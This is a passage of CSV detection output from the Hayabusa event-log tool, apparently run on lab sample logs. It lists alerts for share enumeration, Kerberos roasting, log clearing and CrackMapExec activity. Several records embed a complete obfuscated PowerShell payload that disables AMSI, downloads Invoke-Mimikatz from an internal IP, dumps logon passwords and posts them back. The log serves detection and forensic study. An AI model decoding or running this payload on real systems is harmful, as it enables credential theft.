0x3902ff1,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x5df8549a,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 
0x57d35acf,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x13faf39,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x873c5b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 
0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,info,Collect,Network Share File Access,User: svc_nxlog | Share Name: \\*\dhcp_logs$ | Share Path: \??\C:\DHCP_LOGS | Path: DhcpSrvLog-Wed.log | IP Addr: 10.23.42.22 | LID: 0x5ddeb1e0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.435 
+09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66373,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 0xc66373,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::ffff:192.168.1.2 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,info,,Admin Logon,User: Bob | LID: 0xc66389,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Bob | Computer: | IP Addr: 192.168.1.2 | LID: 0xc66389,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP 
Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.2 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Bob | LID: 0xc66389,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc712f1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: 192.168.1.100 | LID: 0xc7142b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc714d9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::1 | Status: 
0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7313f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7adb8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7ae25,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,info,,NTLM Logon To Local Account,User: Alice | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.691 
+09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Alice | Computer: | IP Addr: 192.168.1.200 | LID: 0x27d676,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.200 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL | Svc: sql101 | IP Addr: ::ffff:192.168.1.200 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx +2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Alice | LID: 0x27d676,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets 
Kerberoasting/Security.evtx +2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H
51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured 
-Embedding | LID: 0x36df3b7 | PID: 7728 | PGUID: 9828DA72-683B-608C-A30C-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell 
Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx +2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101
@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfS
H,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49
k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | LID: 0x36df3b7 | PID: 4436 | PGUID: 